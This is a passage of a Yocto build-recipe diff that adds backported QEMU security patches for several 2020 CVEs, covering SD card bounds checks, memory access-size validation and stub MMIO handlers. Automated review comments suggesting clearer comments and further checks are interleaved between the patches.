+- if (sd->data_start + sd->blk_len > sd->size) {
++ if (addr + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
+ }
++
++ sd->state = sd_sendingdata_state;
++ sd->data_start = addr;
++ sd->data_offset = 0;
+ return sd_r1;
+
+ default:
+@@ -1188,13 +1190,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ case 18: /* CMD18: READ_MULTIPLE_BLOCK */
+ switch (sd->state) {
+ case sd_transfer_state:
+- sd->state = sd_sendingdata_state;
+- sd->data_start = addr;
+- sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
++ if (addr + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
+ }
++
++ sd->state = sd_sendingdata_state;
++ sd->data_start = addr;
++ sd->data_offset = 0;
+ return sd_r1;
+
+ default:
+@@ -1234,14 +1238,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ /* Writing in SPI mode not implemented. */
+ if (sd->spi)
+ break;
++
++ if (addr + sd->blk_len > sd->size) {
++ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
++ }
++
+ sd->state = sd_receivingdata_state;
+ sd->data_start = addr;
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
+- sd->card_status |= ADDRESS_ERROR;
+- }
+ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+ }
+@@ -1261,14 +1268,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ /* Writing in SPI mode not implemented. */
+ if (sd->spi)
+ break;
++
++ if (addr + sd->blk_len > sd->size) {
++ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
++ }
++
+ sd->state = sd_receivingdata_state;
+ sd->data_start = addr;
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
+- sd->card_status |= ADDRESS_ERROR;
+- }
+ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+ }
+--
+2.32.0
+
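Review bot: The two write cases (the hunks at 1238 and 1268) now treat ADDRESS_ERROR and WP_VIOLATION differently, but only the commit message explains why. A short comment above the new guard would keep that visible in the code, e.g. `/* ADDRESS_ERROR rejects the command before any state change; WP_VIOLATION is flagged but still enters receivingdata (SD spec 4.3.4) */`. The same four-line `addr + sd->blk_len > sd->size` guard is also repeated in all four cases (CMD17, CMD18 and the two write cases); a small static helper would keep them from drifting apart. For the multiple-block commands the guard covers only the first block, so later blocks presumably rely on the checks in sd_read_data() and sd_write_data(), which are outside this hunk. sd_normal_command starts and ends outside the hunk.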
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
new file mode 100644
index 0000000000..ffce610f79
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
@@ -0,0 +1,54 @@
+From 9157dd597d293ab7f599f4d96c3fe8a6e07c633d Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Wed, 3 Jun 2020 19:59:16 +0200
+Subject: [PATCH] hw/sd/sdcard: Restrict Class 6 commands to SCSD cards
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+Only SCSD cards support Class 6 (Block Oriented Write Protection)
+commands.
+
+ "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
+
+ 4.3.14 Command Functional Difference in Card Capacity Types
+
+ * Write Protected Group
+
+ SDHC and SDXC do not support write-protected groups. Issuing
+ CMD28, CMD29 and CMD30 generates the ILLEGAL_COMMAND error.
+
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-7-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=9157dd597d293ab7f599f4d96c3fe8a6e07c633d
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index 5137168..1cc16bf 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -920,6 +920,11 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ sd->multi_blk_cnt = 0;
+ }
+
++ if (sd_cmd_class[req.cmd] == 6 && FIELD_EX32(sd->ocr, OCR, CARD_CAPACITY)) {
++ /* Only Standard Capacity cards support class 6 commands */
++ return sd_illegal;
++ }
++
+ switch (req.cmd) {
+ /* Basic commands (Class 0 and Class 1) */
+ case 0: /* CMD0: GO_IDLE_STATE */
+--
+1.8.3.1
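Review bot: The status trailer in this patch header is spelled `Upstram-Status: Backport:`, so tooling that searches for the `Upstream-Status:` tag will presumably not recognise the file as a tracked backport. It should read `Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=9157dd597d293ab7f599f4d96c3fe8a6e07c633d]`. In the C change itself, `sd_cmd_class[req.cmd]` is indexed before the `switch (req.cmd)`. The table size and the range of `req.cmd` are not visible in this hunk, so it is worth confirming the index cannot run past the table; sd_normal_command continues outside the hunk.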
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
new file mode 100644
index 0000000000..fdfff9d81d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
@@ -0,0 +1,91 @@
+From 5d971f9e672507210e77d020d89e0e89165c8fc9 Mon Sep 17 00:00:00 2001
+From: "Michael S. Tsirkin" <mst@redhat.com>
+Date: Wed, 10 Jun 2020 09:47:49 -0400
+Subject: [PATCH] memory: Revert "memory: accept mismatching sizes in
+ memory_region_access_valid"
+
+Memory API documentation documents valid .min_access_size and .max_access_size
+fields and explains that any access outside these boundaries is blocked.
+
+This is what devices seem to assume.
+
+However this is not what the implementation does: it simply
+ignores the boundaries unless there's an "accepts" callback.
+
+Naturally, this breaks a bunch of devices.
+
+Revert to the documented behaviour.
+
+Devices that want to allow any access can just drop the valid field,
+or add the impl field to have accesses converted to appropriate
+length.
+
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Richard Henderson <rth@twiddle.net>
+Fixes: CVE-2020-13754
+Fixes: https://bugzilla.redhat.com/show_bug.cgi?id=1842363
+Fixes: a014ed07bd5a ("memory: accept mismatching sizes in memory_region_access_valid")
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+Message-Id: <20200610134731.1514409-1-mst@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=5d971f9e672507210e77d020d89e0e89165c8fc9
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ memory.c | 29 +++++++++--------------------
+ 1 file changed, 9 insertions(+), 20 deletions(-)
+
+diff --git a/memory.c b/memory.c
+index 2f15a4b..9200b20 100644
+--- a/memory.c
++++ b/memory.c
+@@ -1352,35 +1352,24 @@ bool memory_region_access_valid(MemoryRegion *mr,
+ bool is_write,
+ MemTxAttrs attrs)
+ {
+- int access_size_min, access_size_max;
+- int access_size, i;
+-
+- if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
++ if (mr->ops->valid.accepts
++ && !mr->ops->valid.accepts(mr->opaque, addr, size, is_write, attrs)) {
+ return false;
+ }
+
+- if (!mr->ops->valid.accepts) {
+- return true;
+- }
+-
+- access_size_min = mr->ops->valid.min_access_size;
+- if (!mr->ops->valid.min_access_size) {
+- access_size_min = 1;
++ if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
++ return false;
+ }
+
+- access_size_max = mr->ops->valid.max_access_size;
++ /* Treat zero as compatibility all valid */
+ if (!mr->ops->valid.max_access_size) {
+- access_size_max = 4;
++ return true;
+ }
+
+- access_size = MAX(MIN(size, access_size_max), access_size_min);
+- for (i = 0; i < size; i += access_size) {
+- if (!mr->ops->valid.accepts(mr->opaque, addr + i, access_size,
+- is_write, attrs)) {
+- return false;
+- }
++ if (size > mr->ops->valid.max_access_size
++ || size < mr->ops->valid.min_access_size) {
++ return false;
+ }
+-
+ return true;
+ }
+
+--
+1.8.3.1
+
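Review bot: After this change a region that sets `valid.min_access_size` but leaves `valid.max_access_size` at zero gets no size check at all, because the early `return true` on `!mr->ops->valid.max_access_size` runs before the min comparison. The comment `/* Treat zero as compatibility all valid */` does not say that, so I would reword it to `/* max_access_size == 0: no limits declared, accept any size (min_access_size is not checked) */`. Sizes outside the declared range are now rejected instead of adjusted, so every device model in the build that relied on the old behaviour needs its `.valid`/`.impl` fields checked. The -2, -3 and -4 patches in this series cover only ACPI, xHCI and the SiFive CLINT.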
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
new file mode 100644
index 0000000000..7354edc54d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
@@ -0,0 +1,69 @@
+From dba04c3488c4699f5afe96f66e448b1d447cf3fb Mon Sep 17 00:00:00 2001
+From: Michael Tokarev <mjt@tls.msk.ru>
+Date: Mon, 20 Jul 2020 19:06:27 +0300
+Subject: [PATCH] acpi: accept byte and word access to core ACPI registers
+
+All ISA registers should be accessible as bytes, words or dwords
+(if wide enough). Fix the access constraints for acpi-pm-evt,
+acpi-pm-tmr & acpi-cnt registers.
+
+Fixes: 5d971f9e67 (memory: Revert "memory: accept mismatching sizes in memory_region_access_valid")
+Fixes: afafe4bbe0 (apci: switch cnt to memory api)
+Fixes: 77d58b1e47 (apci: switch timer to memory api)
+Fixes: b5a7c024d2 (apci: switch evt to memory api)
+Buglink: https://lore.kernel.org/xen-devel/20200630170913.123646-1-anthony.perard@citrix.com/T/
+Buglink: https://bugs.debian.org/964793
+BugLink: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964247
+BugLink: https://bugs.launchpad.net/bugs/1886318
+Reported-By: Simon John <git@the-jedi.co.uk>
+Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
+Message-Id: <20200720160627.15491-1-mjt@msgid.tls.msk.ru>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=dba04c3488c4699f5afe96f66e448b1d447cf3fb
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/acpi/core.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+diff --git a/hw/acpi/core.c b/hw/acpi/core.c
+index f6d9ec4..ac06db3 100644
+--- a/hw/acpi/core.c
++++ b/hw/acpi/core.c
+@@ -458,7 +458,8 @@ static void acpi_pm_evt_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_evt_ops = {
+ .read = acpi_pm_evt_read,
+ .write = acpi_pm_evt_write,
+- .valid.min_access_size = 2,
++ .impl.min_access_size = 2,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 2,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+@@ -527,7 +528,8 @@ static void acpi_pm_tmr_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_tmr_ops = {
+ .read = acpi_pm_tmr_read,
+ .write = acpi_pm_tmr_write,
+- .valid.min_access_size = 4,
++ .impl.min_access_size = 4,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 4,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+@@ -599,7 +601,8 @@ static void acpi_pm_cnt_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_cnt_ops = {
+ .read = acpi_pm_cnt_read,
+ .write = acpi_pm_cnt_write,
+- .valid.min_access_size = 2,
++ .impl.min_access_size = 2,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 2,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+--
+1.8.3.1
+
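Review bot: Setting `.valid.min_access_size = 1` while `.impl.min_access_size` stays at 2 (4 for `acpi_pm_tmr_ops`) means guest byte accesses are now accepted for handlers that were written for word or dword accesses. For reads that is presumably harmless. For `acpi_pm_evt_write` and `acpi_pm_cnt_write`, confirm that a one-byte guest write cannot overwrite the neighbouring byte of the register with zeros; the handlers are outside these hunks, so it cannot be checked here. A short comment above each ops table, e.g. `/* ISA registers accept byte access; narrower accesses are adapted to impl size */`, would record the intent.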
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
new file mode 100644
index 0000000000..2a8781050f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
@@ -0,0 +1,65 @@
+From 8e67fda2dd6202ccec093fda561107ba14830a17 Mon Sep 17 00:00:00 2001
+From: Laurent Vivier <lvivier@redhat.com>
+Date: Tue, 21 Jul 2020 10:33:22 +0200
+Subject: [PATCH] xhci: fix valid.max_access_size to access address registers
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+QEMU XHCI advertises AC64 (64-bit addressing) but doesn't allow
+64-bit mode access in "runtime" and "operational" MemoryRegionOps.
+
+Set the max_access_size based on sizeof(dma_addr_t) as AC64 is set.
+
+XHCI specs:
+"If the xHC supports 64-bit addressing (AC64 = â1â), then software
+should write 64-bit registers using only Qword accesses. If a
+system is incapable of issuing Qword accesses, then writes to the
+64-bit address fields shall be performed using 2 Dword accesses;
+low Dword-first, high-Dword second. If the xHC supports 32-bit
+addressing (AC64 = â0â), then the high Dword of registers containing
+64-bit address fields are unused and software should write addresses
+using only Dword accesses"
+
+The problem has been detected with SLOF, as linux kernel always accesses
+registers using 32-bit access even if AC64 is set and revealed by
+5d971f9e6725 ("memory: Revert "memory: accept mismatching sizes in memory_region_access_valid"")
+
+Suggested-by: Alexey Kardashevskiy <aik@au1.ibm.com>
+Signed-off-by: Laurent Vivier <lvivier@redhat.com>
+Message-id: 20200721083322.90651-1-lvivier@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=8e67fda2dd6202ccec093fda561107ba14830a17
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/usb/hcd-xhci.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c
+index b330e36..67a18fe 100644
+--- a/hw/usb/hcd-xhci.c
++++ b/hw/usb/hcd-xhci.c
+@@ -3184,7 +3184,7 @@ static const MemoryRegionOps xhci_oper_ops = {
+ .read = xhci_oper_read,
+ .write = xhci_oper_write,
+ .valid.min_access_size = 4,
+- .valid.max_access_size = 4,
++ .valid.max_access_size = sizeof(dma_addr_t),
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
+@@ -3200,7 +3200,7 @@ static const MemoryRegionOps xhci_runtime_ops = {
+ .read = xhci_runtime_read,
+ .write = xhci_runtime_write,
+ .valid.min_access_size = 4,
+- .valid.max_access_size = 4,
++ .valid.max_access_size = sizeof(dma_addr_t),
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
+--
+1.8.3.1
+
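Review bot: `.valid.max_access_size = sizeof(dma_addr_t)` ties the accepted width to a host-side typedef rather than to the AC64 capability the commit message cites, and neither ops table sets `.impl.max_access_size`. Whether `xhci_oper_read`/`xhci_runtime_read` and their write counterparts ever see an 8-byte access therefore depends on the memory core's default implementation size, which is not visible here. A comment such as `/* AC64: allow qword access; handlers still see dword accesses */` would make the assumption explicit, if that is indeed the behaviour. The same question applies to `.max_access_size = 8` for `sifive_clint_ops` in the CVE-2020-13754-4 patch.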
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
new file mode 100644
index 0000000000..6bad07d03f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
@@ -0,0 +1,39 @@
+From 70b78d4e71494c90d2ccb40381336bc9b9a22f79 Mon Sep 17 00:00:00 2001
+From: Alistair Francis <alistair.francis@wdc.com>
+Date: Tue, 30 Jun 2020 13:12:11 -0700
+Subject: [PATCH] hw/riscv: Allow 64 bit access to SiFive CLINT
+
+Commit 5d971f9e672507210e77d020d89e0e89165c8fc9
+"memory: Revert "memory: accept mismatching sizes in
+memory_region_access_valid"" broke most RISC-V boards as they do 64 bit
+accesses to the CLINT and QEMU would trigger a fault. Fix this failure
+by allowing 8 byte accesses.
+
+Signed-off-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: LIU Zhiwei<zhiwei_liu@c-sky.com>
+Message-Id: <122b78825b077e4dfd39b444d3a46fe894a7804c.1593547870.git.alistair.francis@wdc.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=70b78d4e71494c90d2ccb40381336bc9b9a22f79
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/riscv/sifive_clint.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/riscv/sifive_clint.c b/hw/riscv/sifive_clint.c
+index b11ffa0..669c21a 100644
+--- a/hw/riscv/sifive_clint.c
++++ b/hw/riscv/sifive_clint.c
+@@ -181,7 +181,7 @@ static const MemoryRegionOps sifive_clint_ops = {
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ .valid = {
+ .min_access_size = 4,
+- .max_access_size = 4
++ .max_access_size = 8
+ }
+ };
+
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
new file mode 100644
index 0000000000..1e8278f7b7
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
@@ -0,0 +1,44 @@
+Date: Thu, 4 Jun 2020 16:25:24 +0530
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Subject: [PATCH v3] ati-vga: check address before reading configuration bytes (CVE-2020-13791)
+
+While reading PCI configuration bytes, a guest may send an
+address towards the end of the configuration space. It may lead
+to an OOB access issue. Add check to ensure 'address + size' is
+within PCI configuration space.
+
+CVE: CVE-2020-13791
+
+Upstream-Status: Submitted
+https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00979.html
+
+Reported-by: Ren Ding <rding@gatech.edu>
+Reported-by: Hanqing Zhao <hanqing@gatech.edu>
+Reported-by: Yi Ren <c4tren@gmail.com>
+Suggested-by: BALATON Zoltan <balaton@eik.bme.hu>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/display/ati.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+Update v3: avoid modifying 'addr' variable
+ -> https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00834.html
+
+diff --git a/hw/display/ati.c b/hw/display/ati.c
+index 67604e68de..b4d0fd88b7 100644
+--- a/hw/display/ati.c
++++ b/hw/display/ati.c
+@@ -387,7 +387,9 @@ static uint64_t ati_mm_read(void *opaque, hwaddr addr, unsigned int size)
+ val = s->regs.crtc_pitch;
+ break;
+ case 0xf00 ... 0xfff:
+- val = pci_default_read_config(&s->dev, addr - 0xf00, size);
++ if ((addr - 0xf00) + size <= pci_config_size(&s->dev)) {
++ val = pci_default_read_config(&s->dev, addr - 0xf00, size);
++ }
+ break;
+ case CUR_OFFSET:
+ val = s->regs.cur_offset;
+--
+2.26.2
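Review bot: When the new bounds check in the `case 0xf00 ... 0xfff:` arm fails, the read is dropped silently and `val` keeps whatever value it had before the `switch`. Its initialisation is outside the hunk, so confirm it is zero-initialised rather than indeterminate. An `else` branch with `qemu_log_mask(LOG_GUEST_ERROR, "%s: config read out of range\n", __func__);` would make rejected guest accesses visible when tracing, assuming `qemu/log.h` is already included in ati.c. The header also records `Upstream-Status: Submitted`, so the fix that eventually landed upstream may differ from this version and is worth comparing.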
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
new file mode 100644
index 0000000000..20f39f0a26
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
@@ -0,0 +1,50 @@
+From 520f26fc6d17b71a43eaf620e834b3bdf316f3d3 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:25 +0530
+Subject: [PATCH] hw/pci-host: add pci-intack write method
+
+Add pci-intack mmio write method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-2-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu
+https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/qemu/qemu/commit/520f26fc6d17b71a43eaf620e834b3bdf316f3d3 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/pci-host/prep.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/hw/pci-host/prep.c
++++ b/hw/pci-host/prep.c
+@@ -26,6 +26,7 @@
+ #include "qemu/osdep.h"
+ #include "qemu-common.h"
+ #include "qemu/units.h"
++#include "qemu/log.h"
+ #include "qapi/error.h"
+ #include "hw/pci/pci.h"
+ #include "hw/pci/pci_bus.h"
+@@ -119,8 +120,15 @@ static uint64_t raven_intack_read(void *
+ return pic_read_irq(isa_pic);
+ }
+
++static void raven_intack_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
++}
++
+ static const MemoryRegionOps raven_intack_ops = {
+ .read = raven_intack_read,
++ .write = raven_intack_write,
+ .valid = {
+ .max_access_size = 1,
+ },
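Review bot: `raven_intack_write` logs only the function name, so a trace of a misbehaving guest does not show which offset or value was written. Including them costs nothing and helps triage, e.g. `qemu_log_mask(LOG_UNIMP, "%s: write of 0x%" PRIx64 " at 0x%" HWADDR_PRIx " not implemented\n", __func__, data, addr);`. The same applies to the stub handlers added in the CVE-2020-15469-3, -4 and -6 patches. The series also mixes `LOG_UNIMP` and `LOG_GUEST_ERROR` for what look like equivalent cases; choosing one per case (guest touching a register that has no such direction versus an unmodelled feature) would keep the logs consistent.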
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
new file mode 100644
index 0000000000..d6715d337c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
@@ -0,0 +1,69 @@
+From 4f2a5202a05fc1612954804a2482f07bff105ea2 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:26 +0530
+Subject: [PATCH] pci-host: designware: add pcie-msi read method
+
+Add pcie-msi mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-3-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-2.patch?h=ubuntu/focal-security Upstream Commit https://github.com/qemu/qemu/commit/4f2a5202a05fc1612954804a2482f07bff105ea2]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/pci-host/designware.c | 19 +++++++++++++++++++
+ 1 file changed, 19 insertions(+)
+
+diff --git a/hw/pci-host/designware.c b/hw/pci-host/designware.c
+index f9fb97a..bde3a34 100644
+--- a/hw/pci-host/designware.c
++++ b/hw/pci-host/designware.c
+@@ -21,6 +21,7 @@
+ #include "qemu/osdep.h"
+ #include "qapi/error.h"
+ #include "qemu/module.h"
++#include "qemu/log.h"
+ #include "hw/pci/msi.h"
+ #include "hw/pci/pci_bridge.h"
+ #include "hw/pci/pci_host.h"
+@@ -63,6 +64,23 @@ designware_pcie_root_to_host(DesignwarePCIERoot *root)
+ return DESIGNWARE_PCIE_HOST(bus->parent);
+ }
+
++static uint64_t designware_pcie_root_msi_read(void *opaque, hwaddr addr,
++ unsigned size)
++{
++ /*
++ * Attempts to read from the MSI address are undefined in
++ * the PCI specifications. For this hardware, the datasheet
++ * specifies that a read from the magic address is simply not
++ * intercepted by the MSI controller, and will go out to the
++ * AHB/AXI bus like any other PCI-device-initiated DMA read.
++ * This is not trivial to implement in QEMU, so since
++ * well-behaved guests won't ever ask a PCI device to DMA from
++ * this address we just log the missing functionality.
++ */
++ qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
++ return 0;
++}
++
+ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
+ uint64_t val, unsigned len)
+ {
+@@ -77,6 +95,7 @@ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
+ }
+
+ static const MemoryRegionOps designware_pci_host_msi_ops = {
++ .read = designware_pcie_root_msi_read,
+ .write = designware_pcie_root_msi_write,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ .valid = {
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
new file mode 100644
index 0000000000..85abe8ff32
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
@@ -0,0 +1,49 @@
+From 24202d2b561c3b4c48bd28383c8c34b4ac66c2bf Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:27 +0530
+Subject: [PATCH] vfio: add quirk device write method
+
+Add vfio quirk device mmio write method to avoid NULL pointer
+dereference issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Acked-by: Alex Williamson <alex.williamson@redhat.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-4-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/24202d2b561c3b4c48bd28383c8c34b4ac66c2bf]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/vfio/pci-quirks.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/hw/vfio/pci-quirks.c
++++ b/hw/vfio/pci-quirks.c
+@@ -13,6 +13,7 @@
+ #include "qemu/osdep.h"
+ #include "exec/memop.h"
+ #include "qemu/units.h"
++#include "qemu/log.h"
+ #include "qemu/error-report.h"
+ #include "qemu/main-loop.h"
+ #include "qemu/module.h"
+@@ -278,8 +279,15 @@ static uint64_t vfio_ati_3c3_quirk_read(
+ return data;
+ }
+
++static void vfio_ati_3c3_quirk_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++}
++
+ static const MemoryRegionOps vfio_ati_3c3_quirk = {
+ .read = vfio_ati_3c3_quirk_read,
++ .write = vfio_ati_3c3_quirk_write,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
new file mode 100644
index 0000000000..52fac8a051
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
@@ -0,0 +1,53 @@
+From f867cebaedbc9c43189f102e4cdfdff05e88df7f Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:28 +0530
+Subject: [PATCH] prep: add ppc-parity write method
